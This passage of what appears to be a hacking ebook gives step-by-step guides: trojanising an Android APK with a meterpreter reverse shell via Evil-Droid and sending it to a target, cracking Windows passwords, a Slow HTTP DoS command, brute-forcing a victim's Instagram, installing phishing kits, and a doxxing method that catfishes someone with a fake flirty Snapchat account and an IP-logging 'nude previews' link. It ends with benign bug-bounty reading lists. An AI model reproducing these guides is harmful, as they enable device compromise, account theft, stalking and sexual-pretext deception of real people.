Step 8: Viola you have successfully hide the text file within the image. HOW TO DECRYPT THE ENCRYPTED FILE USING KALI LINUX Step 1: To decrypt the Encrypted file, go to your Kali Linux terminal and type the following command steghide extract -sf girl.jpg

Step 2: Now enter the password/passphrase to unlock the file. You need the correct password otherwise the file will not open.

55 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO HACK ANDROID WITH EVILDROID Step 1: To android app hack, first install the following dependencies: Dependencies :      

metasploit-framework xterm Zenity Aapt Apktool Zipalign

Step 2: Download and clone Evil Droid from Github: git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Step 3: Set the execution permissions for the tool: cd Evil-Droid chmod +x evil-droid

Step 4: Now run Evil Droid Framework with the following command ./evil-droid

Step 5: Press 3 to install malware into an existing apk file

56 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

Step 6: Set your Local IP as shown below:

Step 7: Set my port as 4444 as shown in the image below. You can choose any port as long it’s not a commonly used port:

57 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Step 8: Type the name of the APK file

Step 9: Now from all the options select the one you wish to use. I am going to use Android/meterpreter/reverse_tcp

Step 10: Now select the APK you want to use as shown below. I am going to use a random app just for kicks. This APK file in which we are going to add our malicious code to get our Android hacking motion.

58 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Step 11: Now once the file is selected it will start creating the malicious infected app as shown below: Step 12: Now send the apk to the target. Once the target installs and opens the app you will get a reverse shell as shown below:

Step 13: After the successful execution of the step to this, you will get a reverse shell as shown below:

Now you can use meterpreter command to exploit the device

59 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO CRACK WINDOWS 10 PASSWORD WITH OPHCRACK Well, this is a process that goes through multiple stages to break the password of Windows OS. This method is applicable when you have overlooked the password and here we will describe Ophcrack software that will help you in this mission. The tool is sufficient enough to break the password and you just need to download the ISO file of Ophcrack and then burn it in the CD/USB. Now step inside to get comprehensive and detailed information about the method. Step 1: To initiate this method, you need to access another computer to download the ISO file of Ophcrack and you can get the file from the official site of Ophcrack that is listed below. Download

Step 2: On the home page, you will get multiple downloading options, select ‘Ophcrack LiveCD’. Step 3: After downloading Ophcrack LiveCD, you will have to access the burning tool so that you can burn the ISO file to USB and for that, you can use Rufus.

Step 4: In the burning process of the respective file to USB, you will have to perform few 3 tasks, firstly, insert USB on the computer, next to that upload the ISO file on the tool, and lastly, click on the ‘Start Burn’ or ‘Burn’ button.

60 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Step 5: After completing the above step, eject the bootable USB from the computer and then insert the same on the locked computer. Make sure to select the primary boot order as a USB drive and for that, you need to make settings in the BIOS. Step 6: Now restart your computer and soon, you will discover Ophcrack LiveCD on the window screen with 4 options, just go with the default option, i.e. ‘Ophcrack Graphic Mode-automatic’.

Step 7: Thereafter, Ophcrack will start loading the details of the user account and once it is completed, it will fetch the list of user accounts and the respective passwords. Step 8: You can get the password on the ‘NT Pwd’ column and make sure to note it down somewhere.

Step 9: Remove the bootable USB and then restart your computer. Step 10: Now, use the password that you have recovered using Ophcrack LiveCD to login Windows 10. Step 11: Well, your job is done and now you can access Windows 10 smoothly.

61 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO PERFORM A DOS ATTACK "SLOW HTTP" WITH SLOWHTTPTEST Most of web administrators that doesn't care properly about the security of the servers, are often target of attacks that a lot of black hat hackers know how to perform in mass. One of those tricky attacks are the Slow HTTP attacks that target any kind of web server. Let's explain quickly graphically what the attack looks like:

It's just, pretty simple right? However for a bad configured server this can be the doom, the hardware won't be pushed up to the limits, however it hangs basically for education ... (bad example i know). Didn't get it ? Imagine sending 100 old grandmas to a store, with all of them trying to tell a story from their childhood to the cashier so that no other customers can buy anything. For education, the cashier won't kick the grandmas out of the store until they end up telling the story. So, how you can perform such attack easily to a server and don't die trying ? The SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP connections in different ways. Use it to test your web server for DoS vulnerabilites, or just to figure out how many concurrent connections it can handle. SlowHTTPTest works on majority of Linux platforms, OS X and Cygwin - a Unix-like environment and command-line interface for Microsoft Windows, and comes with a Dockerfile to make things even easier. Currently, the supported attacks by the slowhttptest library are:    

Slowloris Slow HTTP POST Apache Range Header Slow Read

In this article, we'll teach you how to install slowhttptest on your Kali Linux system and how to use it to perform this attack on your servers. 1. INSTALL SLOWHTTPTEST The Slowhttptest library is available from the repositories, so you can easily install it from the command line with the following command: # update repos first sudo apt-get update

62 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER # Install the tool sudo apt-get install slowhttptest For more information about this tool, please visit the official repository at Github here. 2. RUNNING TEST Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server. Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly. The command to run the attack to check if the server is the following one: slowhttptest -c 500 -H -g -o ./output_file -i 10 -r 200 -t GET -u http://yourwebsite-or-server-ip.com -x 24 -p 2 The command is described as next:          

-c: Specifies the target number of connections to establish during the test (in this example 500, normally with 200 should be enough to hang a server that doesn't have protection against this attack). -H: Starts slowhttptest in SlowLoris mode, sending unfinished HTTP requests. -g: Forces slowhttptest to generate CSV and HTML files when test finishes with timestamp in filename. -o: Specifies custom file name, effective with -g. -i: Specifies the interval between follow up data for slowrois and Slow POST tests (in seconds). -r: Specifies the connection rate (per second). -t: Specifies the verb to use in HTTP request (POST, GET etc). -u: Specifies the URL or IP of the server that you want to attack. -x: Starts slowhttptest in Slow Read mode, reading HTTP responses slowly. -p: Specifies the interval to wait for HTTP response onprobe connection, before marking the server as DoSed (in seconds).

Now if we run the command with the target server, we get a similar output in the terminal:

63 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER As you can see, our target is our own website, however even with 500 connections, our server doesn't hang at all because we do have protection against this kind of attacks. The service available will be always YES if the target is reachable. You can test with another computer/network if the website is still up indeed. The generate output in HTML created by our options, will be the following one:

But, what if we disable the protection against Slow HTTP attacks in our server? Well, the output should be different and the website on the target server won't be reachable:

Don't trust always the service available message, just try accessing the real website from a browser and you will see if it works or not. The generated output this time is different because of the unreachable website:

64 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO HIDE DATA IN AN AUDIO FILE Method for hiding files in a picture, and this time we will show you a method for hiding data in audio files. LET'S GET STARTED:     

Download and install DeepSound - http://jpinsoft.net/DeepSound/Download.aspx Open the program and click on "Open carrier files", then specify the path where the audio file is stored, where the information will be hidden. Click on "Add secret files" and select the required data. Next click on "Encode secret files". The files were hidden in the "music". In order to get them out of there, on the main page of the program, add the audio file in which the data was encrypted and click on "Extract secret files".

Done! Now you know another method for storing important information securely.

HOW TO DOX SOMEONE USING SNAPCHAT Doxing, or doxxing, is the Internet-based practice of researching and publicly broadcasting private or identifying information about an individual or organization. The methods employed to acquire this information include searching publicly available databases and social media websites, hacking, and social engineering This will work the best if you already have your targets snapchat, you may be able to get it with the info you already have.  

   

  

STEP 1: Create a snapchat with a female name (emily18x) and make a bitmoji for the account. STEP 2: score your Snapchat score to make it look like a legit account. you can spam pictures to random accounts like @abc @1234, but it's easier to spend $1 on a snapchat score boosting service. you can find that here: discord.gg/cxWwETYBnK (by @alexender). STEP 3: Create a empty google drive folder call it "nude previews" and set the shareable link to "Anyone with link". STEP 4: Go to grabify.link and put in your drive link > click on make custom link/change domain (green button) > change it to imageshare.best STEP 5: Add your target on snapchat if you do not have him already and start talking in a flirty way. STEP 6: He will start talking about nudes at some point. you say "I have some nudes in my drive ;)" then send the link right away. then he will say its empty. tell him "ohh my bad wrong folder!" and send the link you make in the following steps. STEP 7: Now you got his ip address, you can see which phone he uses etc. STEP 8: Create a new folder also called nude previews and set the shareable link to "restricted" (standard settings). STEP 9: Send that link he will need to request access and if he does that you got his email in your email inbox.

====EXTRA STEPS====  

STEP 10: If he uses his face in the profile picture of his email get a full size version of it using this tutorial: www.youtube.com/watch?v=ir0-uSL80RA&t STEP 11: Simply google his gmail account without the @gmail.com and if he uses his name obviously go to instagram/facebook search him

If they don't click on your links just ignore them for 5 minutes, their dick will click on it. 65 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO HACK INSTAGRAM ACCOUNT [BRUTEFORCE] NOTE : Don’t expect that you can hack whatever account you want!This is just the demonstration of how it works!For 100% work you need deeper understanding of it! This is just Bruteforce attack and don't expect results all the time.  So the first thing you need is Kali Linux or Parrot Sec OS or any other Linux OS  You can download parrot OS from here https://parrotsec.org and kali Linux from here kali.org Now lets start the guide. 1. So the first thing you need is a net connection and brain and yeah don't forget Linux any distro or flavor 2. So lets start for the purpose of this tutorial i am gonna use the technique of brute force. 3. Brute force is the technique of trying random passwords against a single user from a pre defined character set or more specifically we can say I am gonna to talk about a dictionary attack. [So dictionary attack is an attack in which the passwords are saved in a file from where we try these passwords on a single user.] Ok so lets start and run following commands. Open Terminal apt update && apt ugrade -y apt-get install git apt-get install python apt-get install python3 cd Desktop {changing directory to desktop} git clone https://github.com/Pure-L0G1C/Instagram o {This command will clone the github repo}  chmod +x Instagram  cd Instagram  python instagram.py -h {to get the help menu}       

Now just simply enter this command  python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file [wordlist file comes already by default in Linux or parrot just extract rockyou or you can use your own worldlist /usr/share/wordlists and replace the path ] If the users password is in rockyou than this gonna work but if not than its your bad luck but you can try other ways if you want.

66 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

CRACK A PDF PASSWORD WITH BRUTE FORCE USING JOHN THE RIPPER John the Ripper is a fast password cracker, currently available for many flavors of Unix, macOS, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus hundreds of additional hashes and ciphers in "-jumbo" versions. In this topic we will explain you how to try to crack a PDF with password using a brute-force attack with JohnTheRipper. 1. BUILD JOHNTHERIPPER BINARIES We will need to work with the Jumbo version of JohnTheRipper. This is a community-enhanced, "jumbo" version of John the Ripper. It has a lot of code, documentation, and data contributed by the user community. This is not "official" John the Ripper code. It is very easy for new code to be added to jumbo: the quality requirements are low. This means that you get a lot of functionality that is not "mature" enough or is otherwise inappropriate for the official JtR, which in turn also means that bugs in this code are to be expected. Proceed to obtain the source code of JohnTheRipper (The "bleeding-jumbo" branch (default) is based on 1.8.0-Jumbo-1) from the repository at Github with the following command (or download the zip with the content and extract into some directory): git clone https://github.com/magnumripper/JohnTheRipper.git This will create a directory namely JohnTheRipper in the current directory. You can read more about the "Jumbo" version of JohnTheRipper project in the official website or visit the un-official code repository at Github here. Switch to the src directory of JohnTheRipper with the following command: cd ./JohnTheRipper/src Proceed to download the package lists from the repositories with the following command: sudo apt-get update And install libssl: sudo apt-get install libssl-dev The library requires libssl (openssl) to be installed in your system, so in case you don't have it the previous command will do the trick to accomplish this requirement. Once the repository has been cloned, proceed to enter into the source directory that contains the source code of JohnTheRipper: cd ./JohnTheRipper/src Inside this directory we will proceed with the build with the following instruction: ./configure && make This version of Jumbo has autoconf that supports the very common chain, allowing you to compile the sources on a Unix-like system. Once the build process finishes, switch to the run directory inside the JohnTheRipper directory:

67 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER cd .. cd ./run Inside this directory you will find (after the build) all the tools that the library has to offer (including john itself), you can list the directory to compare: ls You will see all the tools of JohnTheRipper inside this directory:

Now that you have the tools to proceed, let's get started with the brute force attack. 2. GENERATE PDF HASH FILE JohnTheRipper, as mentioned at the beginning of the article is not related by itself to PDF´s, but to passwords and security stuff. That's why you will need to create the hash file of the PDF using the pdf2john.pl tool (available in the run directory after compiling from source). This tool allows you to obtain the hash (Read meta information) of the file through this perl script, which can be extracted into a new file with the following command: pdf2john.pl /root/Desktop/pdf_protected.pdf > /root/Desktop/pdf.hash This command will create a .hash file in the defined directory. This is the file that we will use to work with JohnTheRipper tool:

68 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER The pdf.hash file contains a text like: /root/Desktop/pdf_protected.pdf:$pdf$4*4*128*4*1*16*d22933dd530666ced293ccf5f860214f*32*ab12d2e30eae3d43d69ac57efc2918c128bf4e5e4e758a4164004e56f ffa0108*32*07419b7fe590bdc9926bb9750adeedb8c07b5407d9b5314c012d16e25e9e7f20 Now that we have the hash file, we can proceed with the brute forcing using the john CLI tool. 3. BRUTE FORCE WITH JOHN Now that we have the .hash file of the PDF with password that we want to unlock, we just need to pass the file as argument to the CLI tool of JohnTheRipper (in the run directory): john protected_pdf.hash This will use UTF-8 as the default input encoding and will start to guess the password of the PDF file using the default wordlist of the library. If it's found, it will display the password and the path to the protected PDF:

If you try to run the command on the same file after the password has been guessed, you will see the following messages: "No password hashes loaded", "No password hashes loaded", or "No password hashes left to crack (see FAQ)". Cracked passwords will be printed to the terminal and saved in the file called $JOHN/john.pot (in the documentation and in the configuration file for John, "$JOHN" refers to John's "home directory"; which directory it really is depends on how you installed John). The $JOHN/john.pot file is also used to not load password hashes that you already cracked when you run John the next time. If that's the case, you will be able to see the password again of the same file using the --show flag: john --show /root/Desktop/pdf.hash So the password will be shown (in our case 54321):

69 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

USING A CUSTOM WORD LIST If you don't want to use the default password.lst file of JohnTheRipper, just specify the path to the new file using the -wordlist argument: john --wordlist=password.lst protected_pdf.hash As final recommendation, the tool offers to crack a lot of files, so you may want to read the documentation of the library. The rest of documentation is located in separate files, listed here in the recommended order of reading:                   

INSTALL - installation instructions OPTIONS - command line options and additional utilities EXAMPLES - usage examples - strongly recommended MODES - cracking modes: what they are FAQ - frequently asked questions BUGS - list of known bugs DYNAMIC - how to use dynamic format in JtR DYNAMIC COMPILER FORMATS - List of known hash formats built using the dynamic compiler DYNAMIC_SCRIPTING - how to build/optimise a format that uses dynamic README.bash-completion - how to enable bash completion for JtR CONTACT (*) - how to contact the author or otherwise obtain support CONFIG (*) - how to customize EXTERNAL (*) - defining an external mode RULES (*) - wordlist rules syntax CHANGES (*) - history of changes CREDITS (*) - credits LICENSE - copyrights and licensing terms COPYING - GNU GPL version 2, as referenced by LICENSE above (*) most users can safely skip these.

70 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

SHELLPHISH: A PHISHING TOOL Shellphish is an interesting tool that we came across that illustrates just how easy and powerful phishing tools have become today. The tool leverages some of the templates generated by another tool called SocialFish. The tool offers phishing templates for 18 popular sites, the majority are focused on social media and email providers. There is also an option to use a custom template if so desired. INSTALLATION Shellphish is fairly straight forward to install. It can be done on your Linux of choice, we will be using Kali. We fire up our Kali Linux and use the terminal to navigate to the desktop. cd Desktop We need to clone the ShellPhish from GitHub, the download link is provided below. git clone https://github.com/thelinuxchoice/shellphish.git This makes a folder named “shellphish” on our desktop. Let’s check the folder and its contents. ls cd shellphish/ ls The next step is to change the permissions of the shellphish.sh file so that we as the admin can use it. We don’t want everyone to have open access to it. chmod 744 shellphish.sh And that’s it, now we can launch our phishing tool ./shellphish.sh EXPLORING TEMPLATES ShellPhish offers us 18 prebuilt templates, we will look through 3 of them to get an idea of what someone on the receiving end looks at when they get a link generated by this tool. Get the Instagram page. The platform needs no introduction. We can see what the malicious link leads to, the page it shows is very convincing and might easily fool someone who isn’t paying attention.

71 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

EVILGINX2- ADVANCED PHISHING ATTACK FRAMEWORK One of the biggest concerns in today’s cyberspace is Phishing, it’s one of those things that uses what a user is familiar with against them. This is a MITM attack framework that sits between the user and site that they are trying to access to potentially steal their credentials. The framework is written in GO and implements its own HTTP and DNS server, making the setup process a breeze. INSTALLATION    

go get -u github.com/kgretzky/evilginx2 cd $GOPATH/src/github.com/kgretzky/evilginx2 make make install

72 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

73 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

MODULE 03: GETTING STARTED IN BUG BOUNTY HUNTING

74 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

NO ONE WILL TELL YOU ANYTHING OR EVERYTHING ABOUT THIS FIELD, IT’S A LONG STRANGE PATH BUT YOU HAVE TO TRAVEL IT ALONE WITH LITTLE HELP FROM OTHERS. Bug Bounty Hunting is an exciting field to be in today, To define Bug Bounty in simple wording I’ll day “Bug Bounty is a reward paid to an Ethical Hacker for identifying and disclosing a potential security bug found in a participant’s Web, Mobile or System.”. But I hope as you’re here already you know enough about bug bounty hunting that I don’t need to define it to get into the usual basics.   

First of all I want you guys to Read The article by Eric Raymond http://www.catb.org/esr/faqs/hackerhowto.html For Me It has become standard guideline for Starters. As Mentioned In This Article One of The Most Important Thing You Need to Have If You want Become a Hacker is Attitude!

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won’t make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won’t let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you’ll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker. What You Should Know Before Starting to learn about Bug Bounty Hunting? I’ll be writing this topic (Getting Started In Bug Bounty Hunting) in 3 Major Phases were I’ll break down things to be as easy as possible because the major audience in my mind right now is absolute beginners or ones who have already tried learning or working but failed for some reason…

PHASE #01

Phase 01 is Based on Basics of Networks communication stuff, Programming & Automation. Well first of all to work on anything you need to know some very basic thing, that includes how a system works and how you can make changes to it. Now let’s start from very basics… Web, HTTP & Network Basics: Web: Just for the overview, you should give a read to one of these    

https://www.tutorialspoint.com/web_developers_guide/web_basic_concepts.htm https://developers.google.com/web/fundamentals/security/ http://www.alphadevx.com/a/7-The-Basics-of-Web-Technologies http://www.cs.kent.edu/~svirdi/Ebook/wdp/ch01.pdf 75 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER HTTP: Communication is the key to success thus in order to learn something works on in our case how an application works and what it’s flow is we need to learn how it communicates with you. and the Most basic thing I can think of is knowing about HTTP. Mentioning a few places you should definitely visit to get an idea about HTTP.       

https://www.w3.org/Protocols/ https://www.w3schools.com/whatis/whatis_http.asp https://www.tutorialspoint.com/http/http_status_codes.htm https://www.tutorialspoint.com/http/http_url_encoding.htm https://www.tutorialspoint.com/http/http_requests.htm https://www.tutorialspoint.com/http/http_responses.htm https://www.hacker101.com/sessions/web_in_depth

What You’ll basically learn from these is about HTTP Protocols, HTTP Requests, Response, Status Codes, Encoding/Decoding, and From the last URL you’ll get to learn it under security perspective so you’ll get to learn SOP, Cookie, MIEM & HTML Phrasing. These will definitely help you later with Web app testing and stuff. Networking: A basic understanding of networking is important for anyone who’s into a computer. So a few resources to learn the basics of Networking.        

https://commotionwireless.net/docs/cck/networking/learn-networking-basics/ https://commotionwireless.net/docs/cck/networking/learn-networking-basics/ https://www.slideshare.net/variwalia/basic-to-advanced-networking-tutorials https://www.cisco.com/c/en/us/solutions/small-business/resource-center/networking/networking-basics.html http://www.penguintutor.com/linux/basic-network-reference https://www.utilizewindows.com/list-of-common-network-port-numbers/ https://code.tutsplus.com/tutorials/an-introduction-to-learning-and-using-dns-records–cms-24704 https://www.digitalocean.com/community/tutorials/an-introduction-to-networking-terminology-interfaces-andprotocols

What You’ll learn from these are basics of Networking, TCP/ID, DNS, Network terminologies These will definitely help you later with Recon Process.

LEARN TO MAKE IT; THEN BREAK IT! Programming/Coding: To be a Good Hacker you don’t really need to be a Good Programmer but it’s always good to cover this before going in Any form of Computer Hacking or Bug Bounty in general. Also Sometimes It increases your chances of successfully identifying and exploiting a vulnerability and also you may need code to escalate a bug with a low/medium severity to high/critical. Now I’ll suggest a few languages that one should properly have basic to medium level knowledge about and keep advancing it.

76 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER HTML:    

https://www.w3schools.com/html/ https://www.codecademy.com/learn/learn-html https://learn.shayhowe.com/advanced-html-css/ https://htmldog.com/guides/html/advanced/

PHP:     

https://www.w3schools.com/php/ https://stackify.com/learn-php-tutorials/ https://www.codecademy.com/learn/learn-php https://www.guru99.com/php-tutorials.html https://www.codecademy.com/learn/paths/web-development

JavaScript:   

https://www.codecademy.com/learn/introduction-to-javascript https://learnjavascript.today/ https://www.thebalancecareers.com/learn-javascript-online-2071405

SQL(Structured Query Language):   

https://www.w3schools.com/sql/ https://www.codecademy.com/learn/learn-sql http://www.sqlcourse.com/

C/C++    

https://www.learncpp.com/ https://www.codecademy.com/learn/learn-c-plus-plus https://www.sololearn.com/Course/CPlusPlus/ https://www.learn-c.org/

Java:   

https://www.codecademy.com/learn/learn-java https://www.geeksforgeeks.org/java-how-to-start-learning-java/ https://www.learnjavaonline.org/

What You’ll learn from them is not just Programming languages but the proper way of web and systems to communicate that you gonna test, I’m no expert or even a starter I’m just a learner in Programming so sharing the resources I’m currently following. Like you know XSS, HTML injections, PHP Injections, SQLi, etc, and Many other vulnerabilities you can’t exploit properly unless you know the code that runs behind and knows exactly how to communicate so that’s why is learning them are important to get a good start.

77 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Adding Automation to your work:

“NEVER SEND A HUMAN TO DO A MACHINE’S JOB” Well As you know sometimes you need to do your work faster and more efficiently so the best way I think for it is Automating your work Python:   

https://realpython.com/ https://comparite.ch/python-courses (By AIMEE O’DRISCOLL) https://docs.python.org/3/tutorial/

Bash:   

https://www.tutorialspoint.com/unix/shell_scripting.htm https://www.learnshell.org/ https://medium.com/quick-code/top-tutorials-to-learn-shell-scripting-on-linux-platform-c250f375e0e5

Ruby:  

https://www.learnrubyonline.org/ https://www.codecademy.com/learn/learn-ruby

Golang:  

https://tour.golang.org/welcome/1 https://www.udemy.com/learn-go-the-complete-bootcamp-course-golang/

What you’ll learn from these is to code your own tools and understand many other common tools and modify them according to your needs. Ofc one can’t learn all these but should try to get grip on one he likes and get to understand others. So Till Here I’ll say you already knew all the basics, was good around PHP, JS & HTML stuff & also was good around Scripting & SQL or maybe learned a bit or these and gave it a good time I’ll say a few weeks maybe… Then congrats you have already gone through Phase #01 this means that you have done 39% Off Learning Work towards being a good Bug Hunter/ Ethical Hacker.

PHASE #02 Phase 02 is Based on Learning about Vulnerabilities, Resources to follow to learn them, Places to practice & Tools etc.

“BEING A HACKER IS LOTS OF FUN, BUT IT’S A KIND OF FUN THAT TAKES LOTS OF EFFORT. THE EFFORT TAKES MOTIVATION.” Now let’s start with the basic learning about InfoSec the first and really most important step would be to choose a proper initial path that you are going to start learning. Choosing the right path to start in Bug Bounty is very important. It totally depends upon your interest, like some people choose Web Application path first coz it’s easy to learn and go through than mobile and others…

78 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER I’ll focus on Web, & Mobile Here coz this is what my interest is. Before I add anything else I’ll suggest You to actually go through  

Hacker101 By HackerOne https://www.hacker101.com/ Bugcrowd University https://www.bugcrowd.com/hackers/bugcrowd-university/

Both of these contain a Huge list of resources and lectures that can help you in even a better way than many of us can’t but as you guys are following this as well so I decided to add them here also. Web App Security: Before I Suggest you what to Learn first if you follow my suggested path l’ll like to tell you some ways you can practice your skills.. CTF(Capture The Flag): Now to practice for Bug Bounties you can participate in CTF challenges. Just like the name suggests “Capture The Flag” there are several challenges for you to solve which deals with real-world vulnerabilities. The more you practice on these challenges the more you will learn about the different technologies required to break into an application or a system. For Web App, I’ll suggest you guys read the following books & guides first      

https://www.packtpub.com/networking-and-servers/mastering-modern-web-penetration-testing https://www.amazon.com/Hackers-Underground-Handbook-secure-systems/dp/1451550189 https://leanpub.com/web-hacking-101 https://www.amazon.com/gp/product/1593275641/ https://www.amazon.com/gp/product/1512214566/ https://www.amazon.com/Tangled-Web-Securing-Modern-Applications-ebook/dp/B006FZ3UNI/

Reading these books you will get good knowledge about Web App Penetration testing & Security testing in general and in-depth. In addition to these books, I’ll suggest you guys should really give good time reading and understanding OWASP Testing Guide & OWASP Top 10 Vulnerabilities from 2010-2017 OWASP Testing project: https://www.owasp.org/index.php/OWASP_Testing_Project OWASP Top 10 Project:  

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#OWASP_Top_10_for_2010 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#OWASP_Top_10_for_2013

Adding a Few basic Pdfs for you guys to go through and save locally to you can keep it revised and keep learning from them. I’ll say they gonna help you almost a hundred percent of the time. So do give these a good time   

Kali Linux Revealed https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf Nmap Cheat Sheet https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf Metasploit Cheat Sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf 79 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Now by this point, I’ll say You have done Good enough research and given good time to practice and learn that you can jump into a Bug Bounty Program to test in real-life environment outside CTF, or test environments. So you can happily jump to the pages at  

https://bugcrowd.com/programs https://hackerone.com/directory

PentesterLab There’s only one way to properly learn web penetration testing: by getting your hands dirty. PentesterLab teaches how to manually find and exploit vulnerabilities and is a good resource to learn and practice all at once. Pentester Academy Another Great resource to practice using online labs and learn, they also provide certifications. And Select a Program But I’ll suggest you read till the end. Following all of them books, testing guides you might have an idea of vulnerabilities so i’ll name a few common ones and try to give good reference to learn them easily. Cross-Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. References to read:  

https://www.imperva.com/learn/application-security/csrf-cross-site-request-forgery/?utm_campaign=Incapsulamoved https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/

Some POCs:        

CSRF Account Takeover famebit by Hassan Khan Hacking PayPal Accounts with one click (Patched) by Yasser Ali Add tweet to collection CSRF by vijay kumar Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun by phwd How i Hacked your Beats account ? Apple Bug Bounty by @aaditya_purani Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) by Florian Courtial Uber CSRF Account Takeover by Ron Chan Messenger.com CSRF that show you the steps when you check for CSRF by Jack Whitton

Cross-Site Scripting (XSS) XSS enables attackers to inject client-side scripts into web pages viewed by other users.

80 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER References to read:   

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://portswigger.net/web-security/cross-site-scripting https://excess-xss.com/

Some POCs:                                   

AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2 by geekboy Uber Self XSS to Global XSS How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) by Marin MoulinierFollow Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities by Brett XSSI, Client Side Brute Force postMessage XSS Bypass XSS in Uber via Cookie by zhchbin Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP by frans XSS due to improper regex in third party js Uber 7k XSS XSS in TinyMCE 2.4.0 by Jelmer de Hen Pass uncoded URL in IE11 to cause XSS Twitter XSS by stopping redirection and javascript scheme by Sergey Bobrov Microsoft XSS and Twitter XSS Google Japan Book XSS Flash XSS mega nz – by frans Flash XSS in multiple libraries – by Olivier Beg xss in google IE, Host Header Reflection Years ago Google xss xss in google by IE weird behavior xss in Yahoo Fantasy Sport xss in Yahoo Mail Again, worth $10000 by Klikki Oy Sleeping XSS in Google by securityguard Decoding a .htpasswd to earn a payload of money by securityguard Google Account Takeover Sleeping stored Google XSS Awakens a $5000 Bounty by Patrik Fehrenbach RPO that lead to information leakage in Google by filedescriptor God-like XSS, Log-in, Log-out, Log-in in Uber by Jack Whitton Three Stored XSS in Facebook by Nirgoldshlager Using a Braun Shaver to Bypass XSS Audit and WAF by Frans Rosen An XSS on Facebook via PNGs & Wonky Content Types by Jack Whitton Stored XSS in *.ebay.com by Jack Whitton Complicated, Best Report of Google XSS by Ramzes Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com by secgeek Command Injection in Google Console by Venkat S Facebook’s Moves – OAuth XSS by PAULOS YIBELO 81 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER        

